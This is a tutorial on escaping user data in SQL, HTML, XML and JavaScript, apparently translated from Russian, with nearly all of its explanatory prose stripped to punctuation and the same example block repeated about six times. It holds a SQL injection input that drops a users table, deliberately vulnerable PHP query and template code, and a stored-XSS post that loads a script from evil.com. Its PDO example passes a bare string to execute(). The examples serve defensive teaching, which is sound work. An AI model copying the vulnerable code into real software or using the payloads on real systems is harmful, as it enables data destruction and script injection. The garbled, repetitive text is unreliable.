SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// Author and body as plain JavaScript string literals; the apostrophe in "don't" is harmless inside double quotes.
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
// Unlike XML, "<" and ">" have no special meaning inside a JavaScript string literal, so this needs no escaping.
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
// Deliberately broken: the unescaped inner double quote after "said " terminates the string literal, so the rest of the line is a syntax error.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// Fixed: the inner quotes are escaped as \" so they stay part of the literal; a literal backslash must in turn be written as \\.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// A fixed query string: safe only because no user-controlled data is concatenated into it.
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// VULNERABLE: $name comes straight from the request and is interpolated into the SQL text unescaped,
// so a single quote in the input ends the literal and whatever follows is run as SQL (SQL injection).
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<?php /* VULNERABLE: username and body are echoed into HTML without htmlspecialchars(), so markup in a post body is rendered as markup instead of text (stored XSS). */ ?>
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Escapes the characters MySQL treats specially inside a string literal (quotes, backslash, NUL, line breaks)
// so a quote in user input can no longer terminate the literal. It escapes according to the current
// connection charset, so that charset must be set first (mysql_set_charset()). ext/mysql itself was
// deprecated in PHP 5.5 and removed in PHP 7.0; prepared statements are the lasting fix.
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
